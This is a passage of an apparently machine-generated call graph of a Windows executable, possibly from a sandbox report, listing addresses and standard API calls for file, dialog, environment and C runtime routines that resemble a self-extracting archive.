24174 2fbc72 GetCPInfo 24173->24174 24174->24169 24174->24170 24176->24133 24177->24133 24179->24146 24180->24146 24181->24164 24182->24163 24184 2fb8cd 24183->24184 24185 2fb977 24183->24185 24193 2fc988 24184->24193 24188 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24185->24188 24189 2fba23 24188->24189 24189->24170 24192 2fab78 __vswprintf_c_l 43 API calls 24192->24185 24194 2f4636 __cftof 38 API calls 24193->24194 24195 2fc9a8 MultiByteToWideChar 24194->24195 24197 2fc9e6 24195->24197 24198 2fca7e 24195->24198 24200 2f8e06 __vswprintf_c_l 21 API calls 24197->24200 24204 2fca07 __cftof __vsnwprintf_l 24197->24204 24199 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24198->24199 24201 2fb92e 24199->24201 24200->24204 24207 2fab78 24201->24207 24202 2fca78 24212 2fabc3 20 API calls _free 24202->24212 24204->24202 24205 2fca4c MultiByteToWideChar 24204->24205 24205->24202 24206 2fca68 GetStringTypeW 24205->24206 24206->24202 24208 2f4636 __cftof 38 API calls 24207->24208 24209 2fab8b 24208->24209 24213 2fa95b 24209->24213 24212->24198 24214 2fa976 __vswprintf_c_l 24213->24214 24215 2fa99c MultiByteToWideChar 24214->24215 24216 2fa9c6 24215->24216 24217 2fab50 24215->24217 24220 2f8e06 __vswprintf_c_l 21 API calls 24216->24220 24222 2fa9e7 __vsnwprintf_l 24216->24222 24218 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24217->24218 24219 2fab63 24218->24219 24219->24192 24220->24222 24221 2faa30 MultiByteToWideChar 24223 2faa49 24221->24223 24236 2faa9c 24221->24236 24222->24221 24222->24236 24240 2faf6c 24223->24240 24227 2faa73 24230 2faf6c __vswprintf_c_l 11 API calls 24227->24230 24227->24236 24228 2faacc __vsnwprintf_l 24231 2fab41 24228->24231 24233 2faf6c __vswprintf_c_l 11 API calls 24228->24233 24229 2faaab 24229->24228 24232 2f8e06 __vswprintf_c_l 21 API calls 24229->24232 24230->24236 24248 2fabc3 20 API calls _free 24231->24248 24232->24228 24235 2fab20 24233->24235 24235->24231 24237 2fab2f WideCharToMultiByte 24235->24237 24249 2fabc3 20 API calls _free 24236->24249 24237->24231 24238 2fab6f 24237->24238 24250 2fabc3 20 API calls _free 24238->24250 24241 2fac98 _abort 5 API calls 24240->24241 24242 2faf93 24241->24242 24243 2faf9c 24242->24243 24251 2faff4 10 API calls 3 library calls 24242->24251 24246 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24243->24246 24245 2fafdc LCMapStringW 24245->24243 24247 2faa60 24246->24247 24247->24227 24247->24229 24247->24236 24248->24236 24249->24217 24250->24236 24251->24245 25300 2fc030 GetProcessHeap 25302 2ea400 GdipDisposeImage GdipFree 25358 2ed600 70 API calls 25303 2f6000 QueryPerformanceFrequency QueryPerformanceCounter 25335 2f2900 6 API calls 4 library calls 25359 2ff200 51 API calls 25375 2fa700 21 API calls 25377 2d1710 86 API calls 25338 2ead10 73 API calls 25378 2f7f6e 52 API calls 3 library calls 25306 2ec793 107 API calls 5 library calls 25360 2f8268 55 API calls _free 25152 2d9f7a 25153 2d9f8f 25152->25153 25158 2d9f88 25152->25158 25154 2d9f9c GetStdHandle 25153->25154 25162 2d9fab 25153->25162 25154->25162 25155 2da003 WriteFile 25155->25162 25156 2d9fcf 25157 2d9fd4 WriteFile 25156->25157 25156->25162 25157->25156 25157->25162 25160 2da095 25164 2d6e98 77 API calls 25160->25164 25162->25155 25162->25156 25162->25157 25162->25158 25162->25160 25163 2d6baa 78 API calls 25162->25163 25163->25162 25164->25158 25308 2d1075 84 API calls 25166 2d9a74 25167 2d9a7e 25166->25167 25168 2d9b9d SetFilePointer 25167->25168 25170 2d981a 79 API calls 25167->25170 25171 2d9b79 25167->25171 25172 2d9ab1 25167->25172 25169 2d9bb6 GetLastError 25168->25169 25168->25172 25169->25172 25170->25171 25171->25168 25309 2ea070 10 API calls 25361 2eb270 99 API calls 25380 2d1f72 128 API calls __EH_prolog 25312 2ea440 GdipCloneImage GdipAlloc 25362 2f3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25381 301f40 CloseHandle 25217 2ecd58 25218 2ece22 25217->25218 25225 2ecd7b _wcschr 25217->25225 25233 2ec793 _wcslen _wcsrchr 25218->25233 25245 2ed78f 25218->25245 25219 2eb314 ExpandEnvironmentStringsW 25219->25233 25221 2ed40a 25222 2e1fbb CompareStringW 25222->25225 25224 2eca67 SetWindowTextW 25224->25233 25225->25218 25225->25222 25228 2f3e3e 22 API calls 25228->25233 25230 2ec855 SetFileAttributesW 25232 2ec90f GetFileAttributesW 25230->25232 25243 2ec86f __cftof _wcslen 25230->25243 25232->25233 25235 2ec921 DeleteFileW 25232->25235 25233->25219 25233->25221 25233->25224 25233->25228 25233->25230 25236 2ecc31 GetDlgItem SetWindowTextW SendMessageW 25233->25236 25239 2ecc71 SendMessageW 25233->25239 25244 2e1fbb CompareStringW 25233->25244 25267 2ea64d GetCurrentDirectoryW 25233->25267 25269 2da5d1 6 API calls 25233->25269 25270 2da55a FindClose 25233->25270 25271 2eb48e 76 API calls 2 library calls 25233->25271 25235->25233 25237 2ec932 25235->25237 25236->25233 25238 2d4092 _swprintf 51 API calls 25237->25238 25240 2ec952 GetFileAttributesW 25238->25240 25239->25233 25240->25237 25241 2ec967 MoveFileW 25240->25241 25241->25233 25242 2ec97f MoveFileExW 25241->25242 25242->25233 25243->25232 25243->25233 25268 2db991 51 API calls 3 library calls 25243->25268 25244->25233 25246 2ed799 __cftof _wcslen 25245->25246 25247 2ed9c0 25246->25247 25248 2ed8a5 25246->25248 25251 2ed9e7 25246->25251 25272 2e1fbb CompareStringW 25246->25272 25247->25251 25253 2ed9de ShowWindow 25247->25253 25250 2da231 3 API calls 25248->25250 25252 2ed8ba 25250->25252 25251->25233 25255 2ed8d1 25252->25255 25273 2db6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25252->25273 25253->25251 25255->25251 25256 2ed925 25255->25256 25257 2ed97b CloseHandle 25255->25257 25261 2ed91b ShowWindow 25255->25261 25274 2edc3b 6 API calls 25256->25274 25258 2ed994 25257->25258 25259 2ed989 25257->25259 25258->25247 25275 2e1fbb CompareStringW 25259->25275 25261->25256 25263 2ed93d 25263->25257 25264 2ed950 GetExitCodeProcess 25263->25264 25264->25257 25265 2ed963 25264->25265 25265->25257 25267->25233 25268->25243 25269->25233 25270->25233 25271->25233 25272->25248 25273->25255 25274->25263 25275->25258 25313 2ee455 14 API calls ___delayLoadHelper2@8 25383 2d6faa 111 API calls 3 library calls 25344 2eeda7 48 API calls _unexpected 25384 2ef3a0 27 API calls 25316 2fa4a0 71 API calls _free 25317 2edca1 DialogBoxParamW 25318 3008a0 IsProcessorFeaturePresent 25385 2e1bbd GetCPInfo IsDBCSLeadByte 23372 2ef3b2 23373 2ef3be ___scrt_is_nonwritable_in_current_image 23372->23373 23404 2eeed7 23373->23404 23375 2ef3c5 23376 2ef518 23375->23376 23379 2ef3ef 23375->23379 23477 2ef838 4 API calls 2 library calls 23376->23477 23378 2ef51f 23470 2f7f58 23378->23470 23389 2ef42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23379->23389 23415 2f8aed 23379->23415 23386 2ef40e 23388 2ef48f 23423 2ef953 GetStartupInfoW __cftof 23388->23423 23389->23388 23473 2f7af4 38 API calls _abort 23389->23473 23391 2ef495 23424 2f8a3e 51 API calls 23391->23424 23394 2ef49d 23425 2edf1e 23394->23425 23398 2ef4b1 23398->23378 23400 2ef4b5 23398->23400 23399 2ef4be 23476 2ef048 12 API calls ___scrt_uninitialize_crt 23399->23476 23400->23399 23475 2f7efb 28 API calls _abort 23400->23475 23403 2ef4c6 23403->23386 23405 2eeee0 23404->23405 23479 2ef654 IsProcessorFeaturePresent 23405->23479 23407 2eeeec 23480 2f2a5e 23407->23480 23409 2eeef1 23414 2eeef5 23409->23414 23488 2f8977 23409->23488 23412 2eef0c 23412->23375 23414->23375 23416 2f8b04 23415->23416 23417 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23416->23417 23418 2ef408 23417->23418 23418->23386 23419 2f8a91 23418->23419 23422 2f8ac0 23419->23422 23420 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23421 2f8ae9 23420->23421 23421->23389 23422->23420 23423->23391 23424->23394 23626 2e0863 23425->23626 23429 2edf3d 23675 2eac16 23429->23675 23431 2edf46 __cftof 23432 2edf59 GetCommandLineW 23431->23432 23433 2edf68 23432->23433 23434 2edfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23432->23434 23679 2ec5c4 23433->23679 23690 2d4092 23434->23690 23440 2edf76 OpenFileMappingW 23444 2edf8f MapViewOfFile 23440->23444 23445 2edfd6 CloseHandle 23440->23445 23441 2edfe0 23684 2edbde 23441->23684 23447 2edfcd UnmapViewOfFile 23444->23447 23450 2edfa0 __InternalCxxFrameHandler 23444->23450 23445->23434 23447->23445 23452 2edbde 2 API calls 23450->23452 23454 2edfbc 23452->23454 23453 2e90b7 8 API calls 23455 2ee0aa DialogBoxParamW 23453->23455 23454->23447 23456 2ee0e4 23455->23456 23457 2ee0fd 23456->23457 23458 2ee0f6 Sleep 23456->23458 23460 2ee10b 23457->23460 23723 2eae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23457->23723 23458->23457 23461 2ee12a DeleteObject 23460->23461 23462 2ee13f DeleteObject 23461->23462 23463 2ee146 23461->23463 23462->23463 23464 2ee189 23463->23464 23465 2ee177 23463->23465 23720 2eac7c 23464->23720 23724 2edc3b 6 API calls 23465->23724 23467 2ee17d CloseHandle 23467->23464 23469 2ee1c3 23474 2ef993 GetModuleHandleW 23469->23474 24007 2f7cd5 23470->24007 23473->23388 23474->23398 23475->23399 23476->23403 23477->23378 23479->23407 23492 2f3b07 23480->23492 23484 2f2a6f 23485 2f2a7a 23484->23485 23506 2f3b43 DeleteCriticalSection 23484->23506 23485->23409 23487 2f2a67 23487->23409 23535 2fc05a 23488->23535 23491 2f2a7d 7 API calls 2 library calls 23491->23414 23493 2f3b10 23492->23493 23495 2f3b39 23493->23495 23497 2f2a63 23493->23497 23507 2f3d46 23493->23507 23512 2f3b43 DeleteCriticalSection 23495->23512 23497->23487 23498 2f2b8c 23497->23498 23528 2f3c57 23498->23528 23501 2f2ba1 23501->23484 23503 2f2baf 23504 2f2bbc 23503->23504 23534 2f2bbf 6 API calls ___vcrt_FlsFree 23503->23534 23504->23484 23506->23487 23513 2f3c0d 23507->23513 23510 2f3d7e InitializeCriticalSectionAndSpinCount 23511 2f3d69 23510->23511 23511->23493 23512->23497 23514 2f3c26 23513->23514 23515 2f3c4f 23513->23515 23514->23515 23520 2f3b72 23514->23520 23515->23510 23515->23511 23518 2f3c3b GetProcAddress 23518->23515 23519 2f3c49 23518->23519 23519->23515 23525 2f3b7e ___vcrt_FlsGetValue 23520->23525 23521 2f3bf3 23521->23515 23521->23518 23522 2f3b95 LoadLibraryExW 23523 2f3bfa 23522->23523 23524 2f3bb3 GetLastError 23522->23524 23523->23521 23526 2f3c02 FreeLibrary 23523->23526 23524->23525 23525->23521 23525->23522 23527 2f3bd5 LoadLibraryExW 23525->23527 23526->23521 23527->23523 23527->23525 23529 2f3c0d ___vcrt_FlsGetValue 5 API calls 23528->23529 23530 2f3c71 23529->23530 23531 2f3c8a TlsAlloc 23530->23531 23532 2f2b96 23530->23532 23532->23501 23533 2f3d08 6 API calls ___vcrt_FlsGetValue 23532->23533 23533->23503 23534->23501 23538 2fc077 23535->23538 23539 2fc073 23535->23539 23537 2eeefe 23537->23412 23537->23491 23538->23539 23541 2fa6a0 23538->23541 23553 2efbbc 23539->23553 23542 2fa6ac ___scrt_is_nonwritable_in_current_image 23541->23542 23560 2fac31 EnterCriticalSection 23542->23560 23544 2fa6b3 23561 2fc528 23544->23561 23546 2fa6c2 23547 2fa6d1 23546->23547 23574 2fa529 29 API calls 23546->23574 23576 2fa6ed LeaveCriticalSection _abort 23547->23576 23550 2fa6e2 _abort 23550->23538 23551 2fa6cc 23575 2fa5df GetStdHandle GetFileType 23551->23575 23554 2efbc4 23553->23554 23555 2efbc5 IsProcessorFeaturePresent 23553->23555 23554->23537 23557 2efc07 23555->23557 23625 2efbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23557->23625 23559 2efcea 23559->23537 23560->23544 23562 2fc534 ___scrt_is_nonwritable_in_current_image 23561->23562 23563 2fc558 23562->23563 23564 2fc541 23562->23564 23577 2fac31 EnterCriticalSection 23563->23577 23585 2f91a8 20 API calls __dosmaperr 23564->23585 23567 2fc546 23586 2f9087 26 API calls __cftof 23567->23586 23568 2fc564 23573 2fc590 23568->23573 23578 2fc479 23568->23578 23570 2fc550 _abort 23570->23546 23587 2fc5b7 LeaveCriticalSection _abort 23573->23587 23574->23551 23575->23547 23576->23550 23577->23568 23588 2fb136 23578->23588 23580 2fc498 23602 2f8dcc 23580->23602 23582 2fc48b 23582->23580 23595 2faf0a 23582->23595 23583 2fc4ea 23583->23568 23585->23567 23586->23570 23587->23570 23593 2fb143 _abort 23588->23593 23589 2fb183 23609 2f91a8 20 API calls __dosmaperr 23589->23609 23590 2fb16e RtlAllocateHeap 23591 2fb181 23590->23591 23590->23593 23591->23582 23593->23589 23593->23590 23608 2f7a5e 7 API calls 2 library calls 23593->23608 23610 2fac98 23595->23610 23598 2faf4f InitializeCriticalSectionAndSpinCount 23599 2faf3a 23598->23599 23600 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23599->23600 23601 2faf66 23600->23601 23601->23582 23603 2f8dd7 RtlFreeHeap 23602->23603 23604 2f8e00 __dosmaperr 23602->23604 23603->23604 23605 2f8dec 23603->23605 23604->23583 23624 2f91a8 20 API calls __dosmaperr 23605->23624 23607 2f8df2 GetLastError 23607->23604 23608->23593 23609->23591 23611 2facc8 23610->23611 23614 2facc4 23610->23614 23611->23598 23611->23599 23612 2face8 23612->23611 23615 2facf4 GetProcAddress 23612->23615 23614->23611 23614->23612 23617 2fad34 23614->23617 23616 2fad04 _abort 23615->23616 23616->23611 23618 2fad55 LoadLibraryExW 23617->23618 23623 2fad4a 23617->23623 23619 2fad72 GetLastError 23618->23619 23622 2fad8a 23618->23622 23621 2fad7d LoadLibraryExW 23619->23621 23619->23622 23620 2fada1 FreeLibrary 23620->23623 23621->23622 23622->23620 23622->23623 23623->23614 23624->23607 23625->23559 23725 2eec50 23626->23725 23629 2e0888 GetProcAddress 23632 2e08b9 GetProcAddress 23629->23632 23633 2e08a1 23629->23633 23630 2e08e7 23631 2e0c14 GetModuleFileNameW 23630->23631 23736 2f75fb 42 API calls __vsnwprintf_l 23630->23736 23642 2e0c32 23631->23642 23635 2e08cb 23632->23635 23633->23632 23635->23630 23636 2e0b54 23636->23631 23637 2e0b5f GetModuleFileNameW CreateFileW 23636->23637 23638 2e0b8f SetFilePointer 23637->23638 23639 2e0c08 CloseHandle 23637->23639 23638->23639 23640 2e0b9d ReadFile 23638->23640 23639->23631 23640->23639 23644 2e0bbb 23640->23644 23645 2e0c94 GetFileAttributesW 23642->23645 23647 2e0c5d CompareStringW 23642->23647 23648 2e0cac 23642->23648 23727 2db146 23642->23727 23730 2e081b 23642->23730 23644->23639 23646 2e081b 2 API calls 23644->23646 23645->23642 23645->23648 23646->23644 23647->23642 23650 2e0cec 23648->23650 23651 2e0cb7 23648->23651 23649 2e0dfb 23674 2ea64d GetCurrentDirectoryW 23649->23674 23650->23649 23654 2db146 GetVersionExW 23650->23654 23652 2e0cd0 GetFileAttributesW 23651->23652 23653 2e0ce8 23651->23653 23652->23651 23652->23653 23653->23650 23655 2e0d06 23654->23655 23656 2e0d0d 23655->23656 23657 2e0d73 23655->23657 23658 2e081b 2 API calls 23656->23658 23659 2d4092 _swprintf 51 API calls 23657->23659 23660 2e0d17 23658->23660 23661 2e0d9b AllocConsole 23659->23661 23664 2e081b 2 API calls 23660->23664 23662 2e0da8 GetCurrentProcessId AttachConsole 23661->23662 23663 2e0df3 ExitProcess 23661->23663 23741 2f3e13 23662->23741 23666 2e0d21 23664->23666 23737 2de617 23666->23737 23667 2e0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23667->23663 23670 2d4092 _swprintf 51 API calls 23671 2e0d4f 23670->23671 23672 2de617 53 API calls 23671->23672 23673 2e0d5e 23672->23673 23673->23663 23674->23429 23676 2e081b 2 API calls 23675->23676 23677 2eac2a OleInitialize 23676->23677 23678 2eac4d GdiplusStartup SHGetMalloc 23677->23678 23678->23431 23682 2ec5ce 23679->23682 23680 2ec6e4 23680->23440 23680->23441 23681 2e1fac CharUpperW 23681->23682 23682->23680 23682->23681 23766 2df3fa 82 API calls 2 library calls 23682->23766 23685 2eec50 23684->23685 23686 2edbeb SetEnvironmentVariableW 23685->23686 23687 2edc0e 23686->23687 23688 2edc36 23687->23688 23689 2edc2a SetEnvironmentVariableW 23687->23689 23688->23434 23689->23688 23767 2d4065 23690->23767 23693 2eb6dd LoadBitmapW 23694 2eb6fe 23693->23694 23695 2eb70b GetObjectW 23693->23695 23835 2ea6c2 FindResourceW 23694->23835 23699 2eb71a 23695->23699 23830 2ea5c6 23699->23830 23701 2eb770 23712 2dda42 23701->23712 23702 2eb74c 23849 2ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23702->23849 23703 2ea6c2 12 API calls 23705 2eb73d 23703->23705 23705->23702 23707 2eb743 DeleteObject 23705->23707 23706 2eb754 23850 2ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23706->23850 23707->23702 23709 2eb75d 23851 2ea80c 8 API calls 23709->23851 23711 2eb764 DeleteObject 23711->23701 23862 2dda67 23712->23862 23717 2e90b7 23995 2eeb38 23717->23995 23721 2eacab GdiplusShutdown CoUninitialize 23720->23721 23721->23469 23723->23460 23724->23467 23726 2e086d GetModuleHandleW 23725->23726 23726->23629 23726->23630 23728 2db15a GetVersionExW 23727->23728 23729 2db196 23727->23729 23728->23729 23729->23642 23731 2eec50 23730->23731 23732 2e0828 GetSystemDirectoryW 23731->23732 23733 2e085e 23732->23733 23734 2e0840 23732->23734 23733->23642 23735 2e0851 LoadLibraryW 23734->23735 23735->23733 23736->23636 23738 2de627 23737->23738 23743 2de648 23738->23743 23742 2f3e1b 23741->23742 23742->23667 23742->23742 23749 2dd9b0 23743->23749 23746 2de66b LoadStringW 23747 2de645 23746->23747 23748 2de682 LoadStringW 23746->23748 23747->23670 23748->23747 23754 2dd8ec 23749->23754 23751 2dd9cd 23752 2dd9e2 23751->23752 23762 2dd9f0 26 API calls 23751->23762 23752->23746 23752->23747 23755 2dd904 23754->23755 23761 2dd984 _strncpy 23754->23761 23758 2dd928 23755->23758 23763 2e1da7 WideCharToMultiByte 23755->23763 23757 2dd959 23765 2f6159 26 API calls 3 library calls 23757->23765 23758->23757 23764 2de5b1 50 API calls __vsnprintf 23758->23764 23761->23751 23762->23752 23763->23758 23764->23757 23765->23761 23766->23682 23768 2d407c __vswprintf_c_l 23767->23768 23771 2f5fd4 23768->23771 23774 2f4097 23771->23774 23775 2f40bf 23774->23775 23776 2f40d7 23774->23776 23791 2f91a8 20 API calls __dosmaperr 23775->23791 23776->23775 23777 2f40df 23776->23777 23793 2f4636 23777->23793 23780 2f40c4 23792 2f9087 26 API calls __cftof 23780->23792 23784 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23785 2d4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23784->23785 23785->23693 23786 2f4167 23802 2f49e6 51 API calls 4 library calls 23786->23802 23789 2f4172 23803 2f46b9 20 API calls _free 23789->23803 23790 2f40cf 23790->23784 23791->23780 23792->23790 23794 2f40ef 23793->23794 23795 2f4653 23793->23795 23801 2f4601 20 API calls 2 library calls 23794->23801 23795->23794 23804 2f97e5 GetLastError 23795->23804 23797 2f4674 23824 2f993a 38 API calls __cftof 23797->23824 23799 2f468d 23825 2f9967 38 API calls __cftof 23799->23825 23801->23786 23802->23789 23803->23790 23805 2f97fb 23804->23805 23806 2f9801 23804->23806 23826 2fae5b 11 API calls 2 library calls 23805->23826 23808 2fb136 _abort 20 API calls 23806->23808 23810 2f9850 SetLastError 23806->23810 23809 2f9813 23808->23809 23811 2f981b 23809->23811 23827 2faeb1 11 API calls 2 library calls 23809->23827 23810->23797 23814 2f8dcc _free 20 API calls 23811->23814 23813 2f9830 23813->23811 23815 2f9837 23813->23815 23816 2f9821 23814->23816 23828 2f9649 20 API calls _abort 23815->23828 23818 2f985c SetLastError 23816->23818 23829 2f8d24 38 API calls _abort 23818->23829 23819 2f9842 23821 2f8dcc _free 20 API calls 23819->23821 23823 2f9849 23821->23823 23823->23810 23823->23818 23824->23799 23825->23794 23826->23806 23827->23813 23828->23819 23852 2ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23830->23852 23832 2ea5cd 23833 2ea5d9 23832->23833 23853 2ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23832->23853 23833->23701 23833->23702 23833->23703 23836 2ea7d3 23835->23836 23837 2ea6e5 SizeofResource 23835->23837 23836->23695 23836->23699 23837->23836 23838 2ea6fc LoadResource 23837->23838 23838->23836 23839 2ea711 LockResource 23838->23839 23839->23836 23840 2ea722 GlobalAlloc 23839->23840 23840->23836 23841 2ea73d GlobalLock 23840->23841 23842 2ea7cc GlobalFree 23841->23842 23843 2ea74c __InternalCxxFrameHandler 23841->23843 23842->23836 23844 2ea7c5 GlobalUnlock 23843->23844 23854 2ea626 GdipAlloc 23843->23854 23844->23842 23847 2ea79a GdipCreateHBITMAPFromBitmap 23848 2ea7b0 23847->23848 23848->23844 23849->23706 23850->23709 23851->23711 23852->23832 23853->23833 23855 2ea638 23854->23855 23856 2ea645 23854->23856 23858 2ea3b9 23855->23858 23856->23844 23856->23847 23856->23848 23859 2ea3da GdipCreateBitmapFromStreamICM 23858->23859 23860 2ea3e1 GdipCreateBitmapFromStream 23858->23860 23861 2ea3e6 23859->23861 23860->23861 23861->23856 23863 2dda75 _wcschr __EH_prolog 23862->23863 23864 2ddaa4 GetModuleFileNameW 23863->23864 23865 2ddad5 23863->23865 23866 2ddabe 23864->23866 23908 2d98e0 23865->23908 23866->23865 23868 2ddb31 23919 2f6310 23868->23919 23872 2ddb05 23872->23868 23874 2de261 78 API calls 23872->23874 23886 2ddd4a 23872->23886 23873 2ddb44 23875 2f6310 26 API calls 23873->23875 23874->23872 23883 2ddb56 ___vcrt_FlsGetValue 23875->23883 23876 2ddc85 23876->23886 23955 2d9d70 81 API calls 23876->23955 23880 2ddc9f ___std_exception_copy 23881 2d9bd0 82 API calls 23880->23881 23880->23886 23884 2ddcc8 ___std_exception_copy 23881->23884 23883->23876 23883->23886 23933 2d9e80 23883->23933 23949 2d9bd0 23883->23949 23954 2d9d70 81 API calls 23883->23954 23884->23886 23894 2ddcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 23884->23894 23956 2e1b84 MultiByteToWideChar 23884->23956 23942 2d959a 23886->23942 23887 2de159 23891 2de1de 23887->23891 23962 2f8cce 26 API calls 2 library calls 23887->23962 23889 2de16e 23963 2f7625 26 API calls 2 library calls 23889->23963 23892 2de214 23891->23892 23900 2de261 78 API calls 23891->23900 23897 2f6310 26 API calls 23892->23897 23894->23886 23894->23887 23902 2e1da7 WideCharToMultiByte 23894->23902 23957 2de5b1 50 API calls __vsnprintf 23894->23957 23958 2f6159 26 API calls 3 library calls 23894->23958 23959 2f8cce 26 API calls 2 library calls 23894->23959 23960 2f7625 26 API calls 2 library calls 23894->23960 23961 2de27c 78 API calls 23894->23961 23895 2de1c6 23964 2de27c 78 API calls 23895->23964 23898 2de22d 23897->23898 23899 2f6310 26 API calls 23898->23899 23899->23886 23900->23891 23902->23894 23906 2de29e GetModuleHandleW FindResourceW 23907 2dda55 23906->23907 23907->23717 23910 2d98ea 23908->23910 23909 2d994b CreateFileW 23911 2d996c GetLastError 23909->23911 23912 2d99bb 23909->23912 23910->23909 23965 2dbb03 23911->23965 23916 2d99ff 23912->23916 23918 2d99e5 SetFileTime 23912->23918 23914 2d998c 23914->23912 23915 2d9990 CreateFileW GetLastError 23914->23915 23915->23912 23917 2d99b5 23915->23917 23916->23872 23917->23912 23918->23916 23920 2f6349 23919->23920 23921 2f634d 23920->23921 23932 2f6375 23920->23932 23969 2f91a8 20 API calls __dosmaperr 23921->23969 23923 2f6699 23926 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23923->23926 23924 2f6352 23970 2f9087 26 API calls __cftof 23924->23970 23928 2f66a6 23926->23928 23927 2f635d 23929 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23927->23929 23928->23873 23930 2f6369 23929->23930 23930->23873 23932->23923 23971 2f6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23932->23971 23934 2d9e92 23933->23934 23938 2d9ea5 23933->23938 23937 2d9eb0 23934->23937 23972 2d6d5b 77 API calls 23934->23972 23936 2d9eb8 SetFilePointer 23936->23937 23939 2d9ed4 GetLastError 23936->23939 23937->23883 23938->23936 23938->23937 23939->23937 23940 2d9ede 23939->23940 23940->23937 23973 2d6d5b 77 API calls 23940->23973 23943 2d95be 23942->23943 23948 2d95cf 23942->23948 23944 2d95ca 23943->23944 23945 2d95d1 23943->23945 23943->23948 23974 2d974e 23944->23974 23979 2d9620 23945->23979 23948->23906 23950 2d9bdc 23949->23950 23952 2d9be3 23949->23952 23950->23883 23952->23950 23953 2d9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23952->23953 23994 2d6d1a 77 API calls 23952->23994 23953->23952 23954->23883 23955->23880 23956->23894 23957->23894 23958->23894 23959->23894 23960->23894 23961->23894 23962->23889 23963->23895 23964->23891 23966 2dbb10 _wcslen 23965->23966 23967 2dbbb8 GetCurrentDirectoryW 23966->23967 23968 2dbb39 _wcslen 23966->23968 23967->23968 23968->23914 23969->23924 23970->23927 23971->23932 23972->23938 23973->23937 23975 2d9757 23974->23975 23976 2d9781 23974->23976 23975->23976 23985 2da1e0 23975->23985 23976->23948 23981 2d962c 23979->23981 23982 2d964a 23979->23982 23980 2d9669 23980->23948 23981->23982 23983 2d9638 CloseHandle 23981->23983 23982->23980 23993 2d6bd5 76 API calls 23982->23993 23983->23982 23986 2eec50 23985->23986 23987 2da1ed DeleteFileW 23986->23987 23988 2d977f 23987->23988 23989 2da200 23987->23989 23988->23948 23990 2dbb03 GetCurrentDirectoryW 23989->23990 23991 2da214 23990->23991 23991->23988 23992 2da218 DeleteFileW 23991->23992 23992->23988 23993->23980 23994->23952 23996 2eeb3d ___std_exception_copy 23995->23996 23997 2e90d6 23996->23997 23999 2eeb59 23996->23999 24004 2f7a5e 7 API calls 2 library calls 23996->24004 23997->23453 24003 2ef5c9 23999->24003 24005 2f238d RaiseException 23999->24005 24001 2ef5e6 24006 2f238d RaiseException 24003->24006 24004->23996 24005->24003 24006->24001 24008 2f7ce1 _abort 24007->24008 24009 2f7cfa 24008->24009 24010 2f7ce8 24008->24010 24031 2fac31 EnterCriticalSection 24009->24031 24043 2f7e2f GetModuleHandleW 24010->24043 24013 2f7ced 24013->24009 24044 2f7e73 GetModuleHandleExW 24013->24044 24018 2f7d01 24021 2f7d76 24018->24021 24030 2f7d9f 24018->24030 24052 2f87e0 20 API calls _abort 24018->24052 24019 2f7dbc 24035 2f7dee 24019->24035 24020 2f7de8 24053 302390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24020->24053 24022 2f7d8e 24021->24022 24026 2f8a91 _abort 5 API calls 24021->24026 24027 2f8a91 _abort 5 API calls 24022->24027 24026->24022 24027->24030 24032 2f7ddf 24030->24032 24031->24018 24054 2fac81 LeaveCriticalSection 24032->24054 24034 2f7db8 24034->24019 24034->24020 24055 2fb076 24035->24055 24038 2f7e1c 24041 2f7e73 _abort 8 API calls 24038->24041 24039 2f7dfc GetPEB 24039->24038 24040 2f7e0c GetCurrentProcess TerminateProcess 24039->24040 24040->24038 24042 2f7e24 ExitProcess 24041->24042 24043->24013 24045 2f7e9d GetProcAddress 24044->24045 24046 2f7ec0 24044->24046 24051 2f7eb2 24045->24051 24047 2f7ecf 24046->24047 24048 2f7ec6 FreeLibrary 24046->24048 24049 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24047->24049 24048->24047 24050 2f7cf9 24049->24050 24050->24009 24051->24046 24052->24021 24054->24034 24056 2fb09b 24055->24056 24060 2fb091 24055->24060 24057 2fac98 _abort 5 API calls 24056->24057 24057->24060 24058 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24059 2f7df8 24058->24059 24059->24038 24059->24039 24060->24058 25345 2eb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24061 2ee5b1 24062 2ee578 24061->24062 24064 2ee85d 24062->24064 24090 2ee5bb 24064->24090 24066 2ee86d 24067 2ee8ca 24066->24067 24072 2ee8ee 24066->24072 24068 2ee7fb DloadReleaseSectionWriteAccess 6 API calls 24067->24068 24069 2ee8d5 RaiseException 24068->24069 24070 2eeac3 24069->24070 24070->24062 24071 2ee966 LoadLibraryExA 24073 2ee979 GetLastError 24071->24073 24074 2ee9c7 24071->24074 24072->24071 24072->24074 